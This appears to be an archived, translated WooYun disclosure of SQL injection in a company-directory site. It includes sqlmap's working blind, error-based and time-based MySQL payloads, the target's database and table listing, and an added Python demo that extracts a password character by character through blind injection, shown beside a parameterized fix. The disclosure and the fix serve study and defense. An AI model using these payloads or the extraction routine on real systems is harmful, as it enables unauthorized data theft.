WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2016-01-11: Details sent to the vendor; awaiting the vendor's response
2016-01-12: Vendor confirmed; details visible to the vendor only
2016-01-22: Details disclosed to core white hats and relevant domain experts
2016-02-01: Details disclosed to regular white hats
2016-02-11: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public
Target site: http://**.**.**.**/ , a site that provides a company directory for mainland China and Taiwan. My English isn't very good, but that is roughly what it is. So the volume of data is huge.

Injection point: http://**.**.**.**/site/about_us/title31_c/index.php?Company_SN=19560
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: Company_SN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Company_SN=19560 AND 1651=1651

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Company_SN=19560 AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x71716b7871,(SELECT (ELT(1414=1414,1))),0x7178767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: Company_SN=19560 AND (SELECT * FROM (SELECT(SLEEP(5)))gxXk)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.3.16
back-end DBMS: MySQL 5.0

current database: 'twinner'
current user is DBA: False
available databases [4]:
[*] information_schema
[*] muchcalm
[*] twinner
[*] twinner_dev
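How the boolean-based blind payload above (`Company_SN=19560 AND 1651=1651`) turns into a data leak, as an added example that is not part of the original report or the target site's code. SQLite from the Python standard library stands in for the report's MySQL backend, so the schema and rows are constructed; `Company`, `Company_SN` and `Twinner_Manager` are names taken from the report, while every column name (and the `password` value) is an assumption made for the demo. The vulnerable lookup splices the GET parameter into SQL text the way the injectable page must; the hardened lookup beside it validates and binds the parameter.

```python
"""Boolean-based blind SQL injection, simulated end to end.

Added example, not code from the original report or the target site.
SQLite (Python stdlib) stands in for the report's MySQL backend; the
schema and rows are constructed. Company, Company_SN and Twinner_Manager
are names taken from the report; every column name is an assumption.
"""
import re
import sqlite3


def build_db():
    """Constructed stand-in for the 'twinner' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Company (Company_SN INTEGER PRIMARY KEY, Name TEXT)")
    conn.executemany("INSERT INTO Company VALUES (?, ?)",
                     [(19560, "Sample Cable Co."), (19561, "Another Co.")])
    # Hypothetical credential table: the columns and values are invented for the demo.
    conn.execute("CREATE TABLE Twinner_Manager (id INTEGER, login TEXT, password TEXT)")
    conn.execute("INSERT INTO Twinner_Manager VALUES (1, 'admin', 's3cret')")
    return conn


def vulnerable_lookup(conn, company_sn):
    """The bug class behind the report: the GET parameter is spliced into SQL text."""
    sql = "SELECT Name FROM Company WHERE Company_SN=" + company_sn
    return conn.execute(sql).fetchall()


def safe_lookup(conn, company_sn):
    """Hardened version: strict decimal validation, then a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", company_sn):
        raise ValueError("Company_SN must be a decimal integer")
    return conn.execute("SELECT Name FROM Company WHERE Company_SN=?",
                        (int(company_sn),)).fetchall()


class BlindOracle:
    """One 'request' per question: does page(19560 AND cond) still show the company?"""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        rows = vulnerable_lookup(self.conn, f"19560 AND ({condition})")
        return len(rows) > 0


def extract_string(oracle, scalar_subquery, max_len=64):
    """Recover a string one character at a time by binary search over its code
    point (0..255). sqlmap asks the same questions on MySQL with MID()/ORD();
    SQLite spells them substr()/unicode()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle.ask(f"length(({scalar_subquery})) >= {pos}"):
            break
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"unicode(substr(({scalar_subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    conn = build_db()
    oracle = BlindOracle(conn)
    # The true/false pair sqlmap used to confirm the injection point.
    true_hit = oracle.ask("1651=1651")
    false_hit = oracle.ask("1651=1652")
    secret = extract_string(oracle, "SELECT password FROM Twinner_Manager WHERE login='admin'")
    # The hardened lookup rejects the payload before it reaches the database.
    try:
        safe_lookup(conn, "19560 AND 1651=1651")
        blocked = False
    except ValueError:
        blocked = True
    return {"true_hit": true_hit, "false_hit": false_hit,
            "secret": secret, "requests": oracle.requests, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

Each recovered character costs one length probe plus eight yes/no requests, which is why a blind dump of tables this size takes so many requests and why the error-based and time-based payloads sqlmap also found matter: error-based returns a value per request, time-based works even when the page shows no visible difference. The fix does not depend on the technique: validate the parameter's shape and bind it, as `safe_lookup` does.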
Dumping the data now. The tables and row counts really are not small! The first one alone has over seven million rows.
Database: twinner
+------------------------------------------+---------+
| Table                                    | Entries |
+------------------------------------------+---------+
| Product_Detail                           | 7043577 |
| Temp_Storage                             | 369603  |
| Product_Feature_Detail                   | 269950  |
| Product_Property                         | 251878  |
| Product                                  | 162398  |
| Product_Site_Classify_Images             | 58180   |
| Product_Feature_Relation                 | 48567   |
| Product_Feature                          | 48240   |
| upload                                   | 38656   |
| Product_Classify                         | 33938   |
| Company_Member                           | 33461   |
| Product_MoreSpec                         | 27905   |
| Product_Site_Classify                    | 26732   |
| Inquiry_Title                            | 22181   |
| Inquiry_List                             | 21731   |
| Product_Property_Temp                    | 19409   |
| Product_Other_Image                      | 17131   |
| Inquiry_List2                            | 16283   |
| Inquiry_Title2                           | 15217   |
| Company_Member_Relation                  | 13951   |
| company_member_class                     | 13542   |
| Company                                  | 13134   |
| Web_Connection                           | 9470    |
| Gbook_R                                  | 8574    |
| Authority_Company_Site_Function          | 7786    |
| Product_Price                            | 6978    |
| Company_Site_Function                    | 6959    |
| general_inquiry                          | 6770    |
| company_new_product                      | 6626    |
| Product_Temp                             | 6368    |
| FAQ                                      | 5764    |
| Company_crm_contact                      | 4511    |
| customer_source                          | 4292    |
| Product_Index                            | 4040    |
| sp_s17                                   | 3366    |
| sp_fieldvalue                            | 3051    |
| crm2_sendmail                            | 3045    |
| end_user_classify                        | 2975    |
| Order_NO                                 | 2889    |
| sp_s3                                    | 2803    |
| sp_s4                                    | 2736    |
| Site_News                                | 2695    |
| sp_s2                                    | 2587    |
| sp_s15                                   | 2436    |
| sp_s16                                   | 2432    |
| sp_s7                                    | 2403    |
| sp_s8                                    | 2333    |
| Product_Classify_3                       | 2315    |
| Ad_Classify                              | 2312    |
| supplier_member_login                    | 2223    |
| s_S2                                     | 2189    |
| sp_s10                                   | 2168    |
| sp_s12                                   | 2151    |
| Product_Classify_AppRelation             | 2075    |
| sp_s11                                   | 2075    |
| s_S1                                     | 2064    |
| Company_Site                             | 2027    |
| sp_s14                                   | 2015    |
| sp_s18                                   | 1881    |
| Company_Contact                          | 1847    |
| s_S3                                     | 1795    |
| Order_Detail                             | 1784    |
| sp_s6                                    | 1750    |
| analytic_mgmt                            | 1625    |
| sp_s1                                    | 1616    |
| sp_s9                                    | 1574    |
| sp_s13                                   | 1560    |
| sp_s5                                    | 1418    |
| s_fieldvalue                             | 1330    |
| s_S5                                     | 1275    |
| sp_s20                                   | 1271    |
| Site_Banner                              | 1257    |
| classify3                                | 1248    |
| Company_Site_Function_copy               | 1203    |
| s_S4                                     | 1202    |
| Competitor_Products                      | 1186    |
| Product_Tabview                          | 1181    |
| s_S6                                     | 1164    |
| Product_Classify_PitchRel                | 1141    |
| About_US                                 | 1133    |
| Product_Site_Classify_MoreSpec           | 1096    |
| select_temp                              | 1043    |
| FAQ_Classify                             | 1017    |
| Solutions_Classify                       | 968     |
| inquiries                                | 902     |
| sp_s23                                   | 899     |
| Order_Title                              | 896     |
| sp_field                                 | 808     |
| sp_s22                                   | 738     |
| forsale                                  | 736     |
| sp_s19                                   | 731     |
| Safety_Relation                          | 714     |
| Contact_Us                               | 639     |
| Customer_Manager                         | 623     |
| keyword_search                           | 605     |
| Web_Connection_Temp                      | 600     |
| Authority_Group_Company_Relation         | 544     |
| company_classify_keyword                 | 541     |
| App_Relation                             | 539     |
| Product_Classify_2                       | 510     |
| sp_s21                                   | 503     |
| App_Classify                             | 474     |
| Letter                                   | 460     |
| Authority_Product_Site_Classify_Function | 456     |
| Product_Other_Image_copy                 | 439     |
| Authority_Menu_Function                  | 438     |
| Web_Connection_Classify                  | 428     |
| Authority_FAQ_Classify_Function          | 426     |
| Site_Home                                | 414     |
| wke_area                                 | 371     |
| Product_MoreSpec_Temp                    | 345     |
| Code_Data                                | 344     |
| Company_keyword                          | 332     |
| s_S10                                    | 307     |
| Product_Structural_Images                | 288     |
| sp_s24                                   | 284     |
| s_S8                                     | 270     |
| Region                                   | 249     |
| Associate_Member                         | 248     |
| Authority_Menu_Collection                | 243     |
| Product_App_Count                        | 238     |
| Associate                                | 217     |
| AppProduct                               | 211     |
| s_S7                                     | 210     |
| Service                                  | 181     |
| sp_group                                 | 167     |
| TempProduct                              | 149     |
| s_fieldname                              | 147     |
| Product_Safe_Image                       | 140     |
| Site_News_classify                       | 139     |
| campaign_supplier                        | 133     |
| gc_male                                  | 131     |
| Attend_Member                            | 120     |
| Authority_Menu_Subsystem                 | 117     |
| Register                                 | 112     |
| Associate_Member_Relation                | 111     |
| Product_HowOrder_Images                  | 108     |
| company_note                             | 100     |
| Classify_MoreSpec                        | 97      |
| Service_Classify                         | 93      |
| customer_certif                          | 91      |
| classify2                                | 89      |
| Product_Pitch_Count                      | 89      |
| template_record                          | 87      |
| Product_Detail_PDF                       | 86      |
| s_S9                                     | 85      |
| oem_odm                                  | 81      |
| SN_Counter                               | 81      |
| Product_app_Classify_3                   | 80      |
| Spec_Search                              | 64      |
| company_messenger                        | 61      |
| Product_Site_Classify_Rel                | 61      |
| Site_Function                            | 59      |
| sp_s26                                   | 57      |
| City                                     | 54      |
| Product_Property_hr_preset               | 52      |
| Member_Bonus                             | 51      |
| Safety                                   | 47      |
| sp_s25                                   | 46      |
| campaign_product                         | 45      |
| Product_Classify_1                       | 44      |
| Carriage_Charge                          | 43      |
| customer_sales                           | 43      |
| Menu_Function                            | 43      |
| Product_factory_Relation                 | 43      |
| customer_staff                           | 41      |
| Product_Classify_Pitch                   | 38      |
| s_tablename                              | 37      |
| Inquiry_List_Temp                        | 35      |
| Authority_Group                          | 32      |
| sp_s27                                   | 31      |
| Product_MoreSpecAV                       | 29      |
| Letter_Title                             | 28      |
| factory                                  | 26      |
| Gbook                                    | 23      |
| history_record                           | 23      |
| Title                                    | 23      |
| Code_Type                                | 22      |
| s_product                                | 22      |
| wke_country                              | 22      |
| order_factory_temp                       | 21      |
| Product_Classify_App                     | 19      |
| Company_crm_messenger                    | 18      |
| crm2_sendmail_content                    | 16      |
| Menu_Collection                          | 16      |
| factory_img                              | 15      |
| CompanyType                              | 14      |
| customer_sources                         | 13      |
| FAQ_MoreSpec                             | 13      |
| Product_Classify_0                       | 13      |
| Car_Member                               | 12      |
| CRM_Manager                              | 12      |
| classify1                                | 11      |
| end_user_classify_to_product             | 11      |
| Member                                   | 11      |
| Competitor_cols                          | 10      |
| Property                                 | 10      |
| wke_lion                                 | 10      |
| wke_lion_mgn                             | 10      |
| wke_plan                                 | 10      |
| wke_plan_mgn                             | 10      |
| Modules                                  | 9       |
| Product_app_Classify_2                   | 8       |
| Sale_Contact                             | 7       |
| supplier_category                        | 7       |
| Twinner_Manager                          | 7       |
| verify_list                              | 7       |
| Carriage_Type                            | 6       |
| Company_Temp                             | 6       |
| mail_model                               | 6       |
| Menu_Subsystem                           | 6       |
| messenger_protocol                       | 6       |
| rotate_swf                               | 6       |
| Sale_Order                               | 6       |
| upload_av                                | 6       |
| cad_specify_cable                        | 5       |
| Charset                                  | 5       |
| Letter_Sender_Title                      | 5       |
| programs                                 | 5       |
| wke_block                                | 5       |
| wke_page                                 | 5       |
| `Language`                               | 4       |
| gc_female                                | 4       |
| list_level                               | 4       |
| Sale_Master                              | 4       |
| Associate_Type                           | 3       |
| Product_Property_hr_title                | 3       |
| Code_Temp                                | 2       |
| MinOrdUnit                               | 2       |
| Parameter_Sheet                          | 2       |
| Product_app_Classify_0                   | 2       |
| Product_app_Classify_1                   | 2       |
| product_quotation                        | 2       |
| wke_news                                 | 2       |
| wke_school                               | 2       |
| number_manage                            | 1       |
| s_show                                   | 1       |
| twinner_right_banner                     | 1       |
| wke_aboutus                              | 1       |
| wke_admuser                              | 1       |
| wke_child                                | 1       |
| wke_live                                 | 1       |
| wke_method                               | 1       |
| wke_pic                                  | 1       |
| wke_sponsor                              | 1       |
| wke_talk                                 | 1       |
| wke_video                                | 1       |
+------------------------------------------+---------+
Severity: High
Vulnerability Rank: 16
Confirmed: 2016-01-12 01:45
Vendor response: Thanks for the report.
None yet